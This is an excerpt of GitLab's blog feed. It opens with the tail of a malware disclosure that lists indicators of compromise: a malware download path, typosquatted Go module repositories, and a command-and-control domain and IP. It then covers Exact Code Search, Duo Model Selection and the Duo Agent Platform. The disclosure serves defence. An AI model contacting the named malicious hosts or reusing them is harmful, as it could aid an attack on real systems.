</tr>
<tr>
<td style="text-align:left"><code>/tmp/vod</code></td>
<td style="text-align:left">Temporary download location of chainelli.mp3 remote administration malware</td>
</tr>
</tbody>
</table>
<h2>How GitLab helps secure the software supply chain</h2>
<p>Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes <a href="https://docs.gitlab.com/user/application_security/secure_your_application/">Application Security Testing</a> scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.</p>
<p>Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.</p>
<h2>Timeline</h2>
<ul>
<li><strong>2025-06-01T09:31:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to Go Security</li>
<li><strong>2025-06-01T09:43:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to GitHub</li>
<li><strong>2025-06-01T10:14:</strong> GitLab reports <code>ellipal.spoolsv.cyou</code> (<code>188.166.213.194</code>) to the IP block owner</li>
<li><strong>2025-06-02T04:03:</strong> Go Security takes down <code>github.com/qiniiu/qmgo</code></li>
<li><strong>2025-06-02T09:57:</strong> The IP block owner suspends <code>188.166.213.194</code></li>
<li><strong>2025-06-03T09:15:</strong> GitHub suspends <code>github.com/qiniiu</code></li>
<li><strong>2025-06-05T17:15:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to Go Security</li>
<li><strong>2025-06-05T17:33:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to GitHub</li>
<li><strong>2025-06-05T17:45:</strong> Go Security takes down <code>github.com/qiiniu/qmgo</code></li>
<li><strong>2025-06-06T12:25:</strong> GitHub suspends <code>github.com/qiiniu</code></li>
</ul>
]]></content>
        <author>
            <name>Michael Henriksen</name>
            <uri>https://about.gitlab.com/blog/authors/michael-henriksen</uri>
        </author>
        <published>2025-06-30T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Exact Code Search: Find code faster across repositories]]></title>
        <id>https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/</id>
        <link href="https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>TL;DR:</strong> What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a> makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.</p>
<h2>Why traditional code search is challenging</h2>
<p>Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.</p>
<p>These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.</p>
<p>GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After <a href="https://gitlab.com/groups/gitlab-org/-/epics/7404">evaluating numerous options</a>, we developed a better solution.</p>
<h2>Introducing Exact Code Search: Three game-changing capabilities</h2>
<p>Enter GitLab's <strong><a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a></strong>, currently in beta testing and powered by <a href="https://github.com/sourcegraph/zoekt">Zoekt</a> (pronounced &quot;zookt&quot;, Dutch for &quot;search&quot;). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.</p>
<p>This feature revolutionizes how you find and understand code with three key capabilities:</p>
<p><strong>1. Exact Match mode: Zero false positives</strong></p>
<p>When toggled to <strong>Exact Match mode</strong>, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:</p>
<ul>
<li>Searching for specific error messages</li>
<li>Looking for particular function signatures</li>
<li>Finding instances of specific variable names</li>
</ul>
<p><strong>2. Regular Expression mode: Powerful pattern matching</strong></p>
<p>For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:</p>
<ul>
<li>Find functions following specific naming patterns</li>
<li>Locate variables matching certain constraints</li>
<li>Identify potential security vulnerabilities using pattern matching</li>
</ul>
<p><strong>3. Multiple-line matches: See code in context</strong></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png" alt="Exact Code Search"></p>
<p>Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.</p>
<h2>From features to workflows: Real-world use cases and impact</h2>
<p>Let's see how these capabilities translate to real productivity gains in everyday development scenarios:</p>
<h3>Debugging: From error message to root cause in seconds</h3>
<p>Before Exact Code Search:
Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.</p>
<p>With Exact Code Search:</p>
<ol>
<li>Copy the exact error message</li>
<li>Paste it into Exact Code Search with Exact Match mode</li>
<li>Instantly find the precise location where the error is thrown, with surrounding context</li>
</ol>
<p><strong>Impact:</strong> Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.</p>
<h3>Code exploration: Master unfamiliar codebases quickly</h3>
<p>Before Exact Code Search:
Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Search for key methods or classes with Exact Match mode</li>
<li>Review multiple line matches to understand implementation details</li>
<li>Use Regular Expression mode to find similar patterns across the codebase</li>
</ul>
<p><strong>Impact:</strong> Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.</p>
<h3>Refactoring with confidence</h3>
<p>Before Exact Code Search:
Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Use Exact Match mode to find all occurrences of methods or variables</li>
<li>Review context to understand usage patterns</li>
<li>Plan your refactoring with complete information about impact</li>
</ul>
<p><strong>Impact:</strong> Eliminate the &quot;missed instance&quot; bugs that often plague refactoring efforts, improving code quality and reducing rework.</p>
<h3>Security auditing: Finding vulnerable patterns</h3>
<p>Security teams can:</p>
<ul>
<li>Create regex patterns matching known vulnerable code</li>
<li>Search across all repositories in a namespace</li>
<li>Quickly identify potential security issues with context that helps assess risk</li>
</ul>
<p><strong>Impact:</strong> Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.</p>
<h3>Cross-repository insights</h3>
<p>Search across your entire namespace or instance to:</p>
<ul>
<li>Identify similar implementations across different projects</li>
<li>Discover opportunities for shared libraries or standardization</li>
</ul>
<p><strong>Impact:</strong> Break down silos between projects and identify opportunities for code reuse and standardization.</p>
<h2>The technical foundation: How Zoekt delivers speed and precision</h2>
<p>Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.</p>
<h3>Positional trigrams: The secret to lightning-fast exact matches</h3>
<p>Zoekt's speed comes from its use of <strong>positional trigrams</strong> — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.</p>
<p>Here's how it works:</p>
<p><strong>Traditional full-text search engines</strong> like Elasticsearch tokenize code into words and lose positional information. When you search for <code>getUserId()</code>, they might return results containing <strong>user</strong>, <strong>get</strong>, and <strong>Id</strong> scattered throughout a file — leading to those frustrating false positives for GitLab users.</p>
<p><strong>Zoekt's positional trigrams</strong> maintain exact character sequences and their positions. When you search for <code>getUserId()</code>, Zoekt looks for the exact trigrams <strong>get</strong>, <strong>etU</strong>, <strong>tUs</strong>, <strong>Use</strong>, <strong>ser</strong>, <strong>erI</strong>, <strong>rId</strong>, <strong>Id(</strong>, and <strong>d()</strong>, all in the correct sequence and position. This ensures that only exact matches are returned.</p>
<p>The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/325234">one of our most requested features</a> for good reason: developers were losing significant time sifting through false positives.</p>
<h3>Regular expression performance at scale</h3>
<p>Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.</p>
<h2>Built for enterprise scale</h2>
<p>Exact Code Search is built to handle massive scale without sacrificing performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.</p>
<h3>Handling terabytes of code with ease</h3>
<p>On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over <strong>48 TB</strong> of code data spanning millions of repositories across thousands of namespaces. To put this in perspective: that's more code than the entire Linux kernel, Android, and Chromium projects combined, yet Exact Code Search can find a specific line across it in milliseconds.</p>
<h3>Self-registering node architecture</h3>
<p>Our innovative implementation features:</p>
<ul>
<li><strong>Automatic node registration:</strong> Zoekt nodes register themselves with GitLab</li>
<li><strong>Dynamic shard assignment:</strong> The system automatically assigns namespaces to nodes</li>
<li><strong>Health monitoring:</strong> Nodes that don't check in are automatically marked offline</li>
</ul>
<p>This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.</p>
<h3>Distributed system with intelligent load balancing</h3>
<p>Behind the scenes, Exact Code Search operates as a distributed system with these key components:</p>
<ul>
<li><strong>Specialized search nodes:</strong> Purpose-built servers that handle indexing and searching</li>
<li><strong>Smart sharding:</strong> Code is distributed across nodes based on namespaces</li>
<li><strong>Automatic load balancing:</strong> The system intelligently distributes work based on capacity</li>
<li><strong>High availability:</strong> Multiple replicas ensure continuous operation even if nodes fail</li>
</ul>
<p><em>Note: High availability is built into the architecture but not yet fully enabled. See <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/514736">Issue 514736</a> for updates.</em></p>
<h3>Seamless security integration</h3>
<p>Exact Code Search automatically integrates with GitLab's permission system:</p>
<ul>
<li>Search results are filtered based on the user's access rights</li>
<li>Only code from projects the user has access to is displayed</li>
<li>Security is built into the core architecture, not added as an afterthought</li>
</ul>
<h3>Optimized performance</h3>
<ul>
<li><strong>Efficient indexing:</strong> Large repositories are indexed in tens of seconds</li>
<li><strong>Fast query execution:</strong> Most searches return results with sub-second response times</li>
<li><strong>Streaming results:</strong> The new gRPC-based federated search streams results as they're found</li>
<li><strong>Early termination:</strong> Once enough results are collected, the system pauses searching</li>
</ul>
<h2>From library to distributed system: Engineering challenges we solved</h2>
<p>While Zoekt provided the core search technology, it was originally designed as a minimal library for managing <code>.zoekt</code> index files, not as a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale:</p>
<h3>Challenge 1: Building an orchestration layer</h3>
<p><strong>The problem:</strong> Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.</p>
<p><strong>Our solution:</strong> We built a comprehensive orchestration layer that:</p>
<ul>
<li>Creates and manages database models to track nodes, indices, repositories, and tasks</li>
<li>Implements a self-registering node architecture (inspired by GitLab Runner)</li>
<li>Handles automatic shard assignment and load balancing across nodes</li>
<li>Provides bidirectional API communication between GitLab Rails and Zoekt nodes</li>
</ul>
<h3>Challenge 2: Scaling storage and indexing</h3>
<p><strong>The problem:</strong> How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?</p>
<p><strong>Our solution:</strong> We implemented:</p>
<ul>
<li>Intelligent sharding: Namespaces are distributed across nodes based on capacity and load</li>
<li>Independent replication: Each node independently indexes from <a href="https://gitlab.com/gitlab-org/gitaly">Gitaly</a> (our Git storage service), eliminating complex synchronization</li>
<li>Watermark management: Sophisticated storage allocation that prevents nodes from running out of space</li>
<li>Unified binary architecture: A single <code>gitlab-zoekt</code> binary that can operate in both indexer and webserver modes</li>
</ul>
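<p>As a rough illustration of watermark-based placement, the sketch below picks the least-loaded node that stays under a storage watermark. The node fields, the 80% figure, and the greedy strategy are assumptions for the example, not the real orchestration logic:</p>

```python
# Hypothetical shard-placement sketch, not GitLab's actual code.
WATERMARK = 0.8  # assumed: refuse new shards once a node would be 80% full

def pick_node(nodes, shard_size):
    """nodes: dicts with 'name', 'used', and 'capacity' (same units)."""
    candidates = [
        n for n in nodes
        if (n["used"] + shard_size) / n["capacity"] <= WATERMARK
    ]
    if not candidates:
        raise RuntimeError("no node below watermark; add capacity")
    # Greedy choice: place the shard on the least-loaded candidate.
    return min(candidates, key=lambda n: n["used"] / n["capacity"])

nodes = [
    {"name": "zoekt-1", "used": 700, "capacity": 1000},
    {"name": "zoekt-2", "used": 200, "capacity": 1000},
]
print(pick_node(nodes, 100)["name"])  # -> zoekt-2
```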
<h3>Challenge 3: Permission integration</h3>
<p><strong>The problem:</strong> Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.</p>
<p><strong>Our solution:</strong> We built native permission filtering directly into the search flow:</p>
<ul>
<li>Search requests include user permission context</li>
<li>Results are filtered at query time to include only projects the user can currently access, guarding against permission changes made after indexing</li>
</ul>
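<p>Conceptually, the query-time check behaves like the Python sketch below. The result shape and the <code>accessible_project_ids</code> set are hypothetical; GitLab's real filtering runs through its authorization layer:</p>

```python
# Minimal sketch of post-search permission filtering (illustrative only).
def filter_results(results, accessible_project_ids):
    """Keep only hits from projects the user can access right now,
    even if the index was built before a permission change."""
    return [r for r in results if r["project_id"] in accessible_project_ids]

results = [
    {"project_id": 1, "path": "app/models/user.rb", "line": 42},
    {"project_id": 2, "path": "lib/secret.rb", "line": 7},
]
# The user can only access project 1, so the project-2 hit is dropped.
print(filter_results(results, {1}))
```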
<h3>Challenge 4: Operational simplicity</h3>
<p><strong>The problem:</strong> Managing a distributed search system shouldn't require a dedicated team.</p>
<p><strong>Our solution:</strong></p>
<ul>
<li>Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work</li>
<li>Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed</li>
<li>Zero-configuration sharding: The system automatically determines optimal shard assignments</li>
</ul>
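<p>The self-healing behavior reduces to a heartbeat check, sketched below. The 90-second timeout and the data shapes are assumed values for the illustration, not the production configuration:</p>

```python
# Hypothetical heartbeat sketch: nodes that have not checked in
# recently are marked offline so their work can be redistributed.
import time

OFFLINE_AFTER = 90  # assumed: seconds without a check-in

def offline_nodes(last_seen, now=None):
    """last_seen: mapping of node name to unix timestamp of last check-in."""
    now = time.time() if now is None else now
    return [name for name, ts in last_seen.items() if now - ts > OFFLINE_AFTER]

now = 1_000_000
last_seen = {"zoekt-1": now - 10, "zoekt-2": now - 300}
print(offline_nodes(last_seen, now=now))  # -> ['zoekt-2']
```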
<h2>Gradual rollout: Minimizing risk at scale</h2>
<p>Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:</p>
<h3>Phase 1: Controlled testing (gitlab-org group)</h3>
<p>We started by enabling Exact Code Search only for the <code>gitlab-org</code> group - our own internal repositories. This allowed us to:</p>
<ul>
<li>Test the system with real production workloads</li>
<li>Identify and fix performance bottlenecks</li>
<li>Streamline the deployment process</li>
<li>Learn from real users' workflows and feedback</li>
</ul>
<h3>Phase 2: Performance validation and optimization</h3>
<p>Before expanding, we focused on ensuring the system could handle GitLab.com's scale:</p>
<ul>
<li>Implemented comprehensive monitoring and alerting</li>
<li>Validated storage management with real production data growth</li>
</ul>
<h3>Phase 3: Incremental customer expansion</h3>
<p>We gradually expanded to customers interested in testing Exact Code Search:</p>
<ul>
<li>Gathered feedback on performance and user experience</li>
<li>Refined the search UI based on real user workflows</li>
<li>Optimized indexing performance (large repositories like <code>gitlab-org/gitlab</code> now index in ~10 seconds)</li>
<li>Refined the architecture based on operational learnings</li>
<li>Massively increased indexing throughput and improved the state transition lifecycle</li>
</ul>
<h3>Phase 4: Broad rollout</h3>
<p>Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:</p>
<ul>
<li>Toggle between regex and exact search modes</li>
<li>Experience the benefits without any configuration changes</li>
<li>Fall back to the previous search if needed (though few choose to)</li>
</ul>
<p>Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.</p>
<blockquote>
<p><strong>For a technical deep dive:</strong> Interested in the detailed architecture and implementation? Check out our <a href="https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/">design document</a> for in-depth details about how we built this distributed search system.</p>
</blockquote>
<h2>Getting started with Exact Code Search</h2>
<p>Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).</p>
<h3>Quickstart guide</h3>
<ol>
<li>Navigate to the Advanced Search in your GitLab project or group</li>
<li>Enter your search term in the code tab</li>
<li>Toggle between Exact Match and Regular Expression modes</li>
<li>Use filters to refine your search</li>
</ol>
<h3>Basic search syntax</h3>
<p>Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:</p>
<table>
<thead>
<tr>
<th>Query Example</th>
<th>What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>file:js</code></td>
<td>Searches only in files containing &quot;js&quot; in their name</td>
</tr>
<tr>
<td><code>foo -bar</code></td>
<td>Finds &quot;foo&quot; but excludes results with &quot;bar&quot;</td>
</tr>
<tr>
<td><code>lang:ruby</code></td>
<td>Searches only in Ruby files</td>
</tr>
<tr>
<td><code>sym:process</code></td>
<td>Finds &quot;process&quot; in symbols (methods, classes, variables)</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Pro Tip:</strong> For the most efficient searches, start specific and then broaden if needed. Using <code>file:</code> and <code>lang:</code> filters dramatically increases relevance.</p>
</blockquote>
<h3>Advanced search techniques</h3>
<p>Stack multiple filters for precision:</p>
<pre><code>is_expected file:rb -file:spec
</code></pre>
<p>This finds &quot;is_expected&quot; in Ruby files that don't have &quot;spec&quot; in their name.</p>
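<p>To make the modifier semantics concrete, here is a toy evaluator in Python - an illustration of the query semantics only, not Zoekt's actual parser:</p>

```python
# Toy query evaluator: `file:` restricts by filename, `-file:` excludes
# by filename, `-term` excludes by content, and bare terms must all match.
def matches(query, filename, text):
    for part in query.split():
        if part.startswith("-file:"):
            if part[6:] in filename:
                return False
        elif part.startswith("file:"):
            if part[5:] not in filename:
                return False
        elif part.startswith("-"):
            if part[1:] in text:
                return False
        elif part not in text:
            return False
    return True

print(matches("is_expected file:rb -file:spec",
              "app/models/user.rb", "it { is_expected }"))   # -> True
print(matches("is_expected file:rb -file:spec",
              "spec/models/user_spec.rb", "is_expected"))    # -> False
```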
<p>Use regular expressions for powerful patterns:</p>
<pre><code>token.*=.*[\&quot;']
</code></pre>
<p><a href="https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&amp;nav_source=navbar&amp;project_id=46649240&amp;group_id=9970&amp;search_code=true&amp;repository_ref=main&amp;regex=true">Watch this search performed against the GitLab Zoekt repository.</a></p>
<p>This search helps surface hardcoded tokens and passwords, which are a security risk if they go undetected.</p>
<p>For more detailed syntax information, check the <a href="https://docs.gitlab.com/user/search/exact_code_search/#syntax">Exact Code Search documentation</a>.</p>
<h2>Availability and deployment</h2>
<h3>Current availability</h3>
<p>Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:</p>
<ul>
<li>Available for over 99% of licensed groups</li>
<li>Search in the UI automatically uses Zoekt when available; Exact Code Search in the Search API is behind a feature flag</li>
</ul>
<h3>Self-managed deployment options</h3>
<p>For self-managed instances, we offer several deployment methods:</p>
<ul>
<li>Kubernetes/Helm: Our most well-supported method, using our <a href="https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt"><code>gitlab-zoekt</code> Helm chart</a></li>
<li>Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods</li>
</ul>
<p>System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.</p>
<h2>What's coming next</h2>
<p>While Exact Code Search is already powerful, we're continuously improving it:</p>
<ul>
<li><strong>Scale optimizations</strong> to support instances with hundreds of thousands of repositories</li>
<li><strong>Improved self-managed deployment</strong> options, including streamlined Omnibus support</li>
<li><strong>Full high availability support</strong> with automatic failover and load balancing</li>
</ul>
<p>Stay tuned for updates as we move from Beta to General Availability.</p>
<h2>Transform how you work with code</h2>
<p>GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:</p>
<ul>
<li>No more wasting time with irrelevant results</li>
<li>No more missing important matches</li>
<li>No more clicking through files just to understand basic context</li>
<li>No more performance issues as codebases grow</li>
</ul>
<p>The impact extends beyond individual productivity:</p>
<ul>
<li><strong>Teams collaborate better</strong> with easy code referencing</li>
<li><strong>Knowledge sharing accelerates</strong> when patterns are discoverable</li>
<li><strong>Onboarding becomes faster</strong> with quick codebase comprehension</li>
<li><strong>Security improves</strong> with effective pattern auditing</li>
<li><strong>Technical debt reduction</strong> becomes more feasible</li>
</ul>
<p>Exact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.</p>
<p><strong>We'd love to hear from you!</strong> Share your experiences, questions, or feedback about Exact Code Search in our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/420920">feedback issue</a>. Your input helps us prioritize improvements and new features.</p>
<blockquote>
<h4>Ready to experience smarter code search? Learn more in our <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">documentation</a> or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try <a href="https://about.gitlab.com/free-trial/">a free, 60-day trial of GitLab Ultimate with Duo</a>!</h4>
</blockquote>
]]></content>
        <author>
            <name>Dmitry Gruzd</name>
            <uri>https://about.gitlab.com/blog/authors/dmitry-gruzd</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed meets governance: Model Selection comes to GitLab Duo]]></title>
        <id>https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/</id>
        <link href="https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>New AI models are released almost daily, each with unique capabilities, performance characteristics, and compliance implications. At GitLab, we're committed to delivering cutting-edge AI capabilities by <a href="https://about.gitlab.com/blog/developing-gitlab-duo-how-we-validate-and-test-ai-models-at-scale/">continuously integrating the latest and highest-performing models as they become available</a>. However, we know this fast pace can create complex challenges for enterprise organizations whose model usage is subject to strict governance, compliance, and security standards.</p>
<p>Meet <a href="https://docs.gitlab.com/user/gitlab_duo/model_selection/">GitLab Duo Model Selection</a>, a powerful new capability that gives teams control over the large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>) used in your organization. Available in private beta in the newly released <a href="https://about.gitlab.com/releases/2025/06/19/gitlab-18-1-released/">GitLab 18.1</a> to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.</p>
<h2>The benefits of GitLab Duo Model Selection</h2>
<p>Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features, though organizations without specialized requirements should stick with the GitLab default model. With Duo Model Selection, you can:</p>
<ul>
<li>
<p><strong>Configure models at the organization level:</strong> Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.</p>
</li>
<li>
<p><strong>Control models per GitLab Duo feature:</strong> Different GitLab Duo features can use different models based on your specific needs.</p>
</li>
</ul>
<p>Watch Duo Model Selection in action:</p>
<p>&lt;div style=&quot;padding:62.21% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1094452473?autoplay=1&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Duo Model Selection Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Join the Duo Model Selection private beta</h2>
<p>Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, <a href="https://about.gitlab.com/gitlab-duo/#free-trial">sign up for a GitLab Duo trial</a> today!</p>
<blockquote>
<p>Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our <a href="https://about.gitlab.com/eighteen/">on-demand launch event</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Susie Bitters</name>
            <uri>https://about.gitlab.com/blog/authors/susie-bitters</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform: What’s next for intelligent DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>I’m thrilled to introduce the next evolution of Duo Workflow: GitLab Duo Agent Platform. This innovative platform extends agentic capabilities across the software development lifecycle, enabling teams to work in parallel with multiple AI agents.</p>
<p>Imagine starting your day like this:</p>
<ul>
<li>You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.</li>
<li>In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.</li>
<li>Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.</li>
<li>Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.</li>
</ul>
<p>All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.</p>
<p><strong>This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks.</strong> That’s the future we’re building with GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and <a href="https://about.gitlab.com/topics/agentic-ai/">AI agents</a> across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.</p>
<p>Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.</p>
<p>GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:</p>
<ul>
<li>Issue implementation</li>
<li>Large-scale migrations/dependency upgrades</li>
<li>Automated documentation building/release posts</li>
<li>Fixing broken pipelines</li>
<li>Incident research support</li>
<li>Deep research of status and information on topics</li>
<li>Backlog administration</li>
<li>Vulnerability resolution</li>
<li>Reviews for specific types of code (e.g. database)</li>
<li>Quick internal tool building based on existing building blocks</li>
<li>and many more!</li>
</ul>
<p>You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.</p>
<p>Watch GitLab Duo Agent Platform in action:
&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1095679084?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Agent Platform Demo Clip&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Choose your tools, your models, and your agents</h2>
<p>Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.</p>
<p>The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.</p>
<p>GitLab Duo Agent Platform will work with any approved language model that <a href="https://about.gitlab.com/ai-transparency-center/#ai-continuity-plan">meets our selection criteria</a>. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.</p>
<h2>Context is everything, and your GitLab Duo agents have it</h2>
<p>The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.</p>
<p>Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.</p>
<p>Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.</p>
<h2>Stay in control while agents scale your team</h2>
